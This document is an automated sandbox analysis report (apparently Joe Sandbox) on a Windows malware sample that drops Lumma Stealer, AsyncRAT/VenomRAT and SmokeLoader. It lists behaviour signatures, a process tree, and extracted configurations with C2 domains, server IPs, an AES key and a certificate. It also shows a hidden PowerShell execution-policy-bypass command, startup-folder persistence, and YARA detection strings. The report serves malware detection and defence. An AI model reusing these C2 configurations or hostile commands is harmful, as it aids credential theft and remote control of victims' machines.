Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7Y18r(14).exe

Overview

General Information

Sample name:7Y18r(14).exe
Analysis ID:1480462
MD5:779806a66cccb6b37a02f6b30f7aecf3
SHA1:0a16526e664ebcfadb6b958580aa12b3deff8645
SHA256:f42503b4678644e3475344042dafa742e5f3d2d75a7c16409f10d7bcca17e028
Tags:exe
Infos:

Detection

LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Check for Windows Defender sandbox
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected Bdaejec
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected SmokeLoader
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious ZIP file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
PE file has a writeable .text section
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 7Y18r(14).exe (PID: 7488 cmdline: "C:\Users\user\Desktop\7Y18r(14).exe" MD5: 779806A66CCCB6B37A02F6B30F7AECF3)
    • IXDaI.exe (PID: 7516 cmdline: C:\Users\user\AppData\Local\Temp\IXDaI.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 8068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 1536 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • F6D9.exe (PID: 2768 cmdline: C:\Users\user\AppData\Local\Temp\F6D9.exe MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 3076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • B552.exe (PID: 4016 cmdline: C:\Users\user\AppData\Local\Temp\B552.exe MD5: D3785ED170CDB1F4784D3DFF3A61DAE0)
        • BitLockerToGo.exe (PID: 4216 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • 753F.exe (PID: 4688 cmdline: C:\Users\user\AppData\Local\Temp\753F.exe MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)
        • 753F.exe (PID: 4852 cmdline: "C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)
        • powershell.exe (PID: 6872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4844 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • vm.exe (PID: 392 cmdline: "vm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
          • cmd.exe (PID: 1436 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • lm.exe (PID: 7864 cmdline: "lm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
              • WerFault.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 628 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wscript.exe (PID: 7068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • cmd.exe (PID: 2504 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • vm.exe (PID: 5776 cmdline: "vm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
            • WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 1124 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • F6D9.exe (PID: 4908 cmdline: "C:\Users\user\AppData\Local\Temp\F6D9.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ftejced (PID: 1240 cmdline: C:\Users\user\AppData\Roaming\ftejced MD5: 779806A66CCCB6B37A02F6B30F7AECF3)
    • IXDaI.exe (PID: 7708 cmdline: C:\Users\user\AppData\Local\Temp\IXDaI.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}
{"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
{"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}
{"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\B552.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
        SourceRuleDescriptionAuthorStrings
        0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
          • 0xf804:$q1: Select * from Win32_CacheMemory
          • 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
          • 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
          • 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
          00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000025.00000002.3741871434.00000000024D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          • 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 36 entries
            SourceRuleDescriptionAuthorStrings
            37.2.vm.exe.4e40000.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              37.2.vm.exe.4e40000.1.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
              • 0xda04:$q1: Select * from Win32_CacheMemory
              • 0xda44:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
              • 0xda92:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
              • 0xdae0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
              43.2.vm.exe.28c0000.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                43.2.vm.exe.28c0000.1.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                • 0xda04:$q1: Select * from Win32_CacheMemory
                • 0xda44:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                • 0xda92:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                • 0xdae0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                37.2.vm.exe.4e40000.1.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  Click to see the 5 entries

                  System Summary

                  barindex
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\F6D9.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 3968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#6110_8yUscnjrUY
                  Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\753F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\753F.exe, ParentProcessId: 4688, ParentProcessName: 753F.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 6872, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\753F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\753F.exe, ParentProcessId: 4688, ParentProcessName: 753F.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 6872, ProcessName: powershell.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3968, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , ProcessId: 7068, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\753F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\753F.exe, ParentProcessId: 4688, ParentProcessName: 753F.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 6872, ProcessName: powershell.exe
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\F6D9.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 3968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#6110_8yUscnjrUY
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ftejced, CommandLine: C:\Users\user\AppData\Roaming\ftejced, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ftejced, NewProcessName: C:\Users\user\AppData\Roaming\ftejced, OriginalFileName: C:\Users\user\AppData\Roaming\ftejced, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\ftejced, ProcessId: 1240, ProcessName: ftejced
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\753F.exe, ProcessId: 4688, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwvtgaet.uft.ps1
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3968, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" , ProcessId: 7068, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\753F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\753F.exe, ParentProcessId: 4688, ParentProcessName: 753F.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" , ProcessId: 6872, ProcessName: powershell.exe

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs
                  No Snort rule has matched
                  Timestamp:2024-07-24T19:56:24.675453+0200
                  SID:2019714
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-24T19:57:04.292679+0200
                  SID:2054602
                  Source Port:49772
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:56:50.332358+0200
                  SID:2054591
                  Source Port:64465
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:26.536004+0200
                  SID:2054604
                  Source Port:49790
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:56:56.104324+0200
                  SID:2054602
                  Source Port:49762
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-24T19:57:18.343059+0200
                  SID:2054653
                  Source Port:49780
                  Destination Port:443
